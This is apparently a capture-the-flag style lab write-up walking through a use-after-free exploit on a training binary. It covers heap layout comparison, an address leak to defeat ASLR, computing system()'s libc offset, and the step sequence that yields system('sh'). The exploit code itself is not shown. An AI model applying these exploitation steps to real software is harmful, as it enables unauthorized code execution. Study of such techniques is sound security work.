The target app

This time we are dealing with a very plain and simple UaF vulnerability. The source code can be found here:

Right away we can see two data structure definitions, which more-less suggest what we are going to be dealing with (structures holding some data along with some function pointers):

While the menu clearly shows what operations are available:

After creating instances of the structures we'll be able to call their dedicated print functions pointed by the (* print) pointers.

If you are familiar with Use after Free, you already know it will all boil down to allocating space for one of them, filling it with arbitrary data wherever we can control it, then asking the program to remove it, then allocating another instance of another structure in the same space previously taken by the first one - and then abusing an old pointer used for tracking the first structure to perform the structure-specific operation, making a function call to an arbitrary address we smuggled inside the data of the second structure.

How data is aligned in memory

So, to find out what fields of the number and data structures overlap with each other and therefore can be used to decide on the exploitation sequence, first we need to know exactly how data is aligned in memory.

We already know that the number structure is 16 bytes long, while the data structure is 32. So we would expect to have to use two number structures to fill the space previously taken by one data instance.

So I ran gdb to find out I was wrong. I allocated three numbers in a row, then took the current heap start address from vmmap output (important to do this AFTER the first allocation, otherwise you won't even see the [heap] section in vmmap output because it won't be allocated by the OS) and had a look. Then I restarted the program and did the same with the number structure. The results are illustrated by the screenshot below:

Comparison of the view of the heap after allocating three number structures versus three data structures

As we can see, both structures take 32 bytes (the 16-bit structure is automatically padded to 32 bytes). This is very convenient for us, as we won't have to struggle with aligning different numbers of instances against each other to achieve the favorable alignment allowing us do something neat.

Combining mutually-overlapping fields of both structures to find the proper codexec UaF scenario

So, since I already started with the visualization thing to clearly see the memory layout, I decided to take further advantage of it to compare what fields in one structure correspond to what fields in the other.

On the upper part of the screenshot (number) function pointers were marked red, actual numbers were marked green. On the lower side of the screenshot (data) function pointers were marked green, last four bytes of the string were marked red:

Looking at this for just a few seconds made it clear to me how to achieve execution control.

We can see that in the number structure, the function pointer (0xb770ccb4 on the screenshot above) occupies the same space that, when allocated with a string, always contains at least one nullbyte (0x00414141 on the screenshot above). This is because the string is automatically null-terminated by fgets() and we can't control it.

Hence, allocating a number, then deleting it, allocating a string in its place and then requesting the program to print the number won't get us far  (we'll crash the program if we call 0x00ANYTHING), as we only control up to three bytes and we are not even overwriting a function pointer, so a partial overwrite won't help us (fgets will always put a null where we want something arbitrary/the most significant byte of the base).

At the same time we can see that the space holding the actual number value (0x41414141 on the screenshot above) which we can control fully as numbers from all ranges are acceptable), sits in the same place as the function pointer for the string structure ( 0xb774dc16 on the screenshot above). Hence, allocating a string, deleting it, creating an arbitrary number and then requesting the string to be printed would effectively lead to the program trying to print the already freed  string with code pointed by our newly created number, still treating it as a pointer to the data-> print(big_str/small_str) function.

Let's try it.

We add a string (its contents are irrelevant, we are only interested in having data structure's print function pointer propagated onto the heap):

Now we remove it:

OK. Now we are going to introduce the pointer address we will trick the target program to call (in our final exploit this will be the address of system()). Let's say we want the program to crash by calling address 0x31337157 (because it's not a valid address in its address space).

Calculating the decimal format:

$ printf "%d" 0x31337157


Now, asking the program to print the string 1 should lead to a segfault at 0x31337157:

Yup. And the string itself will be useful to us to control the arguments (so we'll put system()'s address instead of 0x31337157 and "sh" as the string, leading to system("sh")).

If we look at the corresponding fields on the heap layout we'll see that first 16 bytes of the string buffer are occupied by the reserved fields in the number structure, which means that if we allocate a number after removing a string, taking the space it was allocated on, the first 16 bytes of the structure (6 bytes reserved and 2 bytes of padding) will be left alone with the old values from the string.

So calling system("sh") should be doable:

  1. create a string "sh"
  2. delete the string
  3. create a number == libc system()'s address
  4. 'print' the string

The only problem we have got left to figure out is how to leak the memory layout to bypass ASLR.

Combining mutually-overlapping fields of both structures to find the proper UaF leak scenario

Looking at the layout again brought me the potential answer to this literally after the first glance (which proves how crucial it is to have the literally see the layout).

As we want to leak memory, we need to call a function taking an argument that happens to be/store a pointer.

The goal is to see both possible states of the memory combined and find such a combination of values that will let us achieve our goal. Let's look at the layout again, this time focusing on two particular neighboring double word values we would like to have in one state - and then think if we can groom the memory into that state:

When the space is occupied by a number structure, the +0x20 address contains a pointer (the print function, marked green), while +0x24 contains data (the number, in this case 0x41414141 - but that's irrelevant to our goal, thus marked grey).

Conversely, when the space is occupied by a data structure, the +0x20 address contains data (the last three bytes of the string and its terminating nullbyte - useless to us, hence marked gray), while +0x24 contains a pointer (the print function, marked red).

We want to trick the program to create that state, so we can call the big_num/small_num  number-printing function, with the address of the string-printing function sitting in the space previously occupied by an irrelevant number before it was free()'d and then allocated again (but not entirely overwritten!) for the string structure.

So, we create a number, then we remove it (so the number[index] is not 0, even though the structure it was pointing at was 'removed', which means free()'d).

Then we create a relatively short (less than 15-character) string, to avoid fgets() overwriting the last four bytes of the buff[20], because that is where the old number's print pointer is held and we will want to call it, so it prints out the address of the string-printing function for us, thus leaking to us the mem layout info needed for calculating the system()'s address.

Let's try this slow motion, using a breakpoint in the main loop: b *(main+169).

First, we allocate a number (1):

Now, this is the heap:

Now, we remove the number:

And again, this is the heap (yes, everything is still there after free()):

Now, we make a string up to 16 characters:

Now, this is the heap:

Now, requesting the program to print the number[1] will make it call 0xb779dc65 (big_num) with 0xb779dbc7 as argument, so we have our leak:

So, we have a number vomited out. Let's convert it to a format more readable to us (hex):

Looks good. Let's confirm in gdb:

Confirming that the leaked address is the address of the small_str() function

Awesome. It looks like we have all the bits and pieces to develop an exploit! :D

Calculating system()'s address

This time I decided to skip leaking the contents of the printf()'s GOT entry (as I did in to calculate the system()'s address.

Instead, I decided to find out whether libc's system() address could be calculated based only on the leaked base of the target program's code segment - and it turned out it can! At least on the VM provided for MBE.

Either way, first let's have a look around just like we were about to leak the GOT anyway:

Here are, respectively, our code, rodata and data segments (again, creating a continuous space with fixed offsets from each other):

OK, now we search these ranges for the 0xb7622280 value (the address of printf()) as we know it has to be stored in GOT after the first printf() call:

This time (as opposed to what we had in, our entry is at 0xfa4 offset in the rodata (read-only data) segment, which at the time of taking the screenshot above was at base 0xb77b4000. This is most likely the result of the -z relro gcc compilation flag:

That's OK, this is a countermeasure against GOT overwrites, we don't care about it this time at all.

If we were doing this the usual way,  we would leak the code base first. Then we would calculate the rodata address to then calculate the printf()'s GOT, so then we would leak printf()'s address from it.  And then based on its fixed offset from system() within libc itself, calculate system()'s address. Then get a shell.

But let's try more directly and run the program for a few times, observing the vmmap output, focusing on the relation between the target app code segment base (which we can already leak) and the libc base (which we want to know as well):

Another run:

Yup, in both cases the offsets are the same:

Hence, one leak is enough here (which would not be the case for the stack or the heap, but we don't care about those here).

So, once we subtract 0x1dd000 from the leaked target app code base, we have the libc code base.

Now we want to know system()'s offset within the libc itself (as opposed to calculating the difference from the relative printf() offset):

The required calculations can be done with below python code:

Python offset calculation

With all this in place, we can already exploit the program.

Manual exploitation

This exploitation can be easily conducted by just interacting with the program in console by properly choosing menu options and entering simple strings and numbers:

Full python exploit (pwnlib)